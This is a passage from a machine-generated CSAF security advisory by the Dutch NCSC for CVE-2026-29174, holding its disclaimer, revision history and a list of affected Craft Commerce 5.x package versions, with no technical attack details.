{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-29174",
        "tracking": {
            "current_release_date": "2026-03-20T09:35:31.385081Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-29174",
            "initial_release_date": "2026-03-10T19:19:13.486429Z",
            "revision_history": [
                {
                    "date": "2026-03-10T19:19:13.486429Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-10T19:19:16.826722Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-10T21:28:05.977086Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-10T21:28:09.328517Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-10T21:39:04.072415Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1).| Unknown change."
                },
                {
                    "date": "2026-03-10T21:39:06.184520Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-11T00:04:12.838633Z",
                    "number": "7",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-11T00:33:29.355159Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (88).| Product Identifiers created (87).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-11T14:55:57.837883Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-11T14:56:01.159843Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-11T17:25:26.974777Z",
                    "number": "11",
                    "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-11T17:25:33.360742Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-19T15:29:54.876978Z",
                    "number": "13",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-19T15:29:57.037995Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:35:30.251099Z",
                    "number": "15",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                }
            ],
            "status": "interim",
            "version": "15"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.0",
                                "product": {
                                    "name": "vers:unknown/5.0.0",
                                    "product_id": "CSAFPID-5501249",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.1",
                                "product": {
                                    "name": "vers:unknown/5.0.1",
                                    "product_id": "CSAFPID-5501250",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.10",
                                "product": {
                                    "name": "vers:unknown/5.0.10",
                                    "product_id": "CSAFPID-5501251",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.10"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.10.1",
                                "product": {
                                    "name": "vers:unknown/5.0.10.1",
                                    "product_id": "CSAFPID-5501252",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.10.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.11",
                                "product": {
                                    "name": "vers:unknown/5.0.11",
                                    "product_id": "CSAFPID-5501253",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.11.1",
                                "product": {
                                    "name": "vers:unknown/5.0.11.1",
                                    "product_id": "CSAFPID-5501254",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.11.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.12",
                                "product": {
                                    "name": "vers:unknown/5.0.12",
                                    "product_id": "CSAFPID-5501255",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.12"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.12.1",
                                "product": {
                                    "name": "vers:unknown/5.0.12.1",
                                    "product_id": "CSAFPID-5501256",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.12.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.12.2",
                                "product": {
                                    "name": "vers:unknown/5.0.12.2",
                                    "product_id": "CSAFPID-5501257",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.12.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.13",
                                "product": {
                                    "name": "vers:unknown/5.0.13",
                                    "product_id": "CSAFPID-5501258",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.13"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.14",
                                "product": {
                                    "name": "vers:unknown/5.0.14",
                                    "product_id": "CSAFPID-5501259",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.14"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.15",
                                "product": {
                                    "name": "vers:unknown/5.0.15",
                                    "product_id": "CSAFPID-5501260",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.15"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.16",
                                "product": {
                                    "name": "vers:unknown/5.0.16",
                                    "product_id": "CSAFPID-5501261",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.16"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.16.1",
                                "product": {
                                    "name": "vers:unknown/5.0.16.1",
                                    "product_id": "CSAFPID-5501262",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.16.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.16.2",
                                "product": {
                                    "name": "vers:unknown/5.0.16.2",
                                    "product_id": "CSAFPID-5501263",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.16.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.17",
                                "product": {
                                    "name": "vers:unknown/5.0.17",
                                    "product_id": "CSAFPID-5501264",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.17"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.18",
                                "product": {
                                    "name": "vers:unknown/5.0.18",
                                    "product_id": "CSAFPID-5501265",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.18"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.19",
                                "product": {
                                    "name": "vers:unknown/5.0.19",
                                    "product_id": "CSAFPID-5501266",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.19"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.2",
                                "product": {
                                    "name": "vers:unknown/5.0.2",
                                    "product_id": "CSAFPID-5501267",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.3",
                                "product": {
                                    "name": "vers:unknown/5.0.3",
                                    "product_id": "CSAFPID-5501268",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.4",
                                "product": {
                                    "name": "vers:unknown/5.0.4",
                                    "product_id": "CSAFPID-5501269",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.5",
                                "product": {
                                    "name": "vers:unknown/5.0.5",
                                    "product_id": "CSAFPID-5501270",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.6",
                                "product": {
                                    "name": "vers:unknown/5.0.6",
                                    "product_id": "CSAFPID-5501271",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.7",
                                "product": {
                                    "name": "vers:unknown/5.0.7",
                                    "product_id": "CSAFPID-5501272",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.8",
                                "product": {
                                    "name": "vers:unknown/5.0.8",
                                    "product_id": "CSAFPID-5501273",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.0.9",
                                "product": {
                                    "name": "vers:unknown/5.0.9",
                                    "product_id": "CSAFPID-5501274",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.0.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.1.0",
                                "product": {
                                    "name": "vers:unknown/5.1.0",
                                    "product_id": "CSAFPID-5501275",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.1.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.1.0-beta.1",
                                "product": {
                                    "name": "vers:unknown/5.1.0-beta.1",
                                    "product_id": "CSAFPID-5501276",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.1.0-beta.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.1.0-beta.2",
                                "product": {
                                    "name": "vers:unknown/5.1.0-beta.2",
                                    "product_id": "CSAFPID-5501277",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.1.0-beta.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.1.0-beta.3",
                                "product": {
                                    "name": "vers:unknown/5.1.0-beta.3",
                                    "product_id": "CSAFPID-5501278",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.1.0-beta.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.1.0.1",
                                "product": {
                                    "name": "vers:unknown/5.1.0.1",
                                    "product_id": "CSAFPID-5501279",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.1.0.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.1.1",
                                "product": {
                                    "name": "vers:unknown/5.1.1",
                                    "product_id": "CSAFPID-5501280",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.1.2",
                                "product": {
                                    "name": "vers:unknown/5.1.2",
                                    "product_id": "CSAFPID-5501281",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.1.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.1.3",
                                "product": {
                                    "name": "vers:unknown/5.1.3",
                                    "product_id": "CSAFPID-5501282",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.1.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.1.4",
                                "product": {
                                    "name": "vers:unknown/5.1.4",
                                    "product_id": "CSAFPID-5501283",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.1.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.0",
                                "product": {
                                    "name": "vers:unknown/5.2.0",
                                    "product_id": "CSAFPID-5501284",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.1",
                                "product": {
                                    "name": "vers:unknown/5.2.1",
                                    "product_id": "CSAFPID-5501285",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.10",
                                "product": {
                                    "name": "vers:unknown/5.2.10",
                                    "product_id": "CSAFPID-5501286",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.10"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.11",
                                "product": {
                                    "name": "vers:unknown/5.2.11",
                                    "product_id": "CSAFPID-5501287",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.12",
                                "product": {
                                    "name": "vers:unknown/5.2.12",
                                    "product_id": "CSAFPID-5501288",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.12"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.12.1",
                                "product": {
                                    "name": "vers:unknown/5.2.12.1",
                                    "product_id": "CSAFPID-5501289",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.12.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.2",
                                "product": {
                                    "name": "vers:unknown/5.2.2",
                                    "product_id": "CSAFPID-5501290",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.2.1",
                                "product": {
                                    "name": "vers:unknown/5.2.2.1",
                                    "product_id": "CSAFPID-5501291",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.2.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.3",
                                "product": {
                                    "name": "vers:unknown/5.2.3",
                                    "product_id": "CSAFPID-5501292",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.4",
                                "product": {
                                    "name": "vers:unknown/5.2.4",
                                    "product_id": "CSAFPID-5501293",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.5",
                                "product": {
                                    "name": "vers:unknown/5.2.5",
                                    "product_id": "CSAFPID-5501294",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.6",
                                "product": {
                                    "name": "vers:unknown/5.2.6",
                                    "product_id": "CSAFPID-5501295",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.7",
                                "product": {
                                    "name": "vers:unknown/5.2.7",
                                    "product_id": "CSAFPID-5501296",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.8",
                                "product": {
                                    "name": "vers:unknown/5.2.8",
                                    "product_id": "CSAFPID-5501297",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.9",
                                "product": {
                                    "name": "vers:unknown/5.2.9",
                                    "product_id": "CSAFPID-5501298",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.2.9.1",
                                "product": {
                                    "name": "vers:unknown/5.2.9.1",
                                    "product_id": "CSAFPID-5501299",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.2.9.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.0",
                                "product": {
                                    "name": "vers:unknown/5.3.0",
                                    "product_id": "CSAFPID-5501300",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.0.1",
                                "product": {
                                    "name": "vers:unknown/5.3.0.1",
                                    "product_id": "CSAFPID-5501301",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.0.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.0.2",
                                "product": {
                                    "name": "vers:unknown/5.3.0.2",
                                    "product_id": "CSAFPID-5501302",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.0.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.1",
                                "product": {
                                    "name": "vers:unknown/5.3.1",
                                    "product_id": "CSAFPID-5501303",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.10",
                                "product": {
                                    "name": "vers:unknown/5.3.10",
                                    "product_id": "CSAFPID-5501304",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.10"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.11",
                                "product": {
                                    "name": "vers:unknown/5.3.11",
                                    "product_id": "CSAFPID-5501305",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.12",
                                "product": {
                                    "name": "vers:unknown/5.3.12",
                                    "product_id": "CSAFPID-5501306",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.12"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.13",
                                "product": {
                                    "name": "vers:unknown/5.3.13",
                                    "product_id": "CSAFPID-5501307",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.13"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.2",
                                "product": {
                                    "name": "vers:unknown/5.3.2",
                                    "product_id": "CSAFPID-5501308",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.2.1",
                                "product": {
                                    "name": "vers:unknown/5.3.2.1",
                                    "product_id": "CSAFPID-5501309",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.2.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.2.2",
                                "product": {
                                    "name": "vers:unknown/5.3.2.2",
                                    "product_id": "CSAFPID-5501310",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.2.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.3",
                                "product": {
                                    "name": "vers:unknown/5.3.3",
                                    "product_id": "CSAFPID-5501311",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.4",
                                "product": {
                                    "name": "vers:unknown/5.3.4",
                                    "product_id": "CSAFPID-5501312",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.5",
                                "product": {
                                    "name": "vers:unknown/5.3.5",
                                    "product_id": "CSAFPID-5501313",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.6",
                                "product": {
                                    "name": "vers:unknown/5.3.6",
                                    "product_id": "CSAFPID-5501314",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.7",
                                "product": {
                                    "name": "vers:unknown/5.3.7",
                                    "product_id": "CSAFPID-5501315",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.8",
                                "product": {
                                    "name": "vers:unknown/5.3.8",
                                    "product_id": "CSAFPID-5501316",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.3.9",
                                "product": {
                                    "name": "vers:unknown/5.3.9",
                                    "product_id": "CSAFPID-5501317",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.3.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.0",
                                "product": {
                                    "name": "vers:unknown/5.4.0",
                                    "product_id": "CSAFPID-5501318",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.1",
                                "product": {
                                    "name": "vers:unknown/5.4.1",
                                    "product_id": "CSAFPID-5501319",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.1.1",
                                "product": {
                                    "name": "vers:unknown/5.4.1.1",
                                    "product_id": "CSAFPID-5501320",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.10",
                                "product": {
                                    "name": "vers:unknown/5.4.10",
                                    "product_id": "CSAFPID-5501321",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.10"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.2",
                                "product": {
                                    "name": "vers:unknown/5.4.2",
                                    "product_id": "CSAFPID-5501322",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.3",
                                "product": {
                                    "name": "vers:unknown/5.4.3",
                                    "product_id": "CSAFPID-5501323",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.4",
                                "product": {
                                    "name": "vers:unknown/5.4.4",
                                    "product_id": "CSAFPID-5501324",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.5",
                                "product": {
                                    "name": "vers:unknown/5.4.5",
                                    "product_id": "CSAFPID-5501325",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.5.1",
                                "product": {
                                    "name": "vers:unknown/5.4.5.1",
                                    "product_id": "CSAFPID-5501326",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.5.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.6",
                                "product": {
                                    "name": "vers:unknown/5.4.6",
                                    "product_id": "CSAFPID-5501327",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.7",
                                "product": {
                                    "name": "vers:unknown/5.4.7",
                                    "product_id": "CSAFPID-5501328",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.7.1",
                                "product": {
                                    "name": "vers:unknown/5.4.7.1",
                                    "product_id": "CSAFPID-5501329",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.7.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.8",
                                "product": {
                                    "name": "vers:unknown/5.4.8",
                                    "product_id": "CSAFPID-5501330",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.4.9",
                                "product": {
                                    "name": "vers:unknown/5.4.9",
                                    "product_id": "CSAFPID-5501331",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.4.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.5.0",
                                "product": {
                                    "name": "vers:unknown/5.5.0",
                                    "product_id": "CSAFPID-5501332",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.5.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.5.0.1",
                                "product": {
                                    "name": "vers:unknown/5.5.0.1",
                                    "product_id": "CSAFPID-5501333",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.5.0.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.5.1",
                                "product": {
                                    "name": "vers:unknown/5.5.1",
                                    "product_id": "CSAFPID-5501334",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.5.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/5.5.2",
                                "product": {
                                    "name": "vers:unknown/5.5.2",
                                    "product_id": "CSAFPID-5780632",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/craftcms/commerce@5.5.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=5.0.0<5.5.3",
                                "product": {
                                    "name": "vers:unknown/>=5.0.0<5.5.3",
                                    "product_id": "CSAFPID-5778720"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=5.0.0|<5.5.3",
                                "product": {
                                    "name": "vers:unknown/>=5.0.0|<5.5.3",
                                    "product_id": "CSAFPID-5780633"
                                }
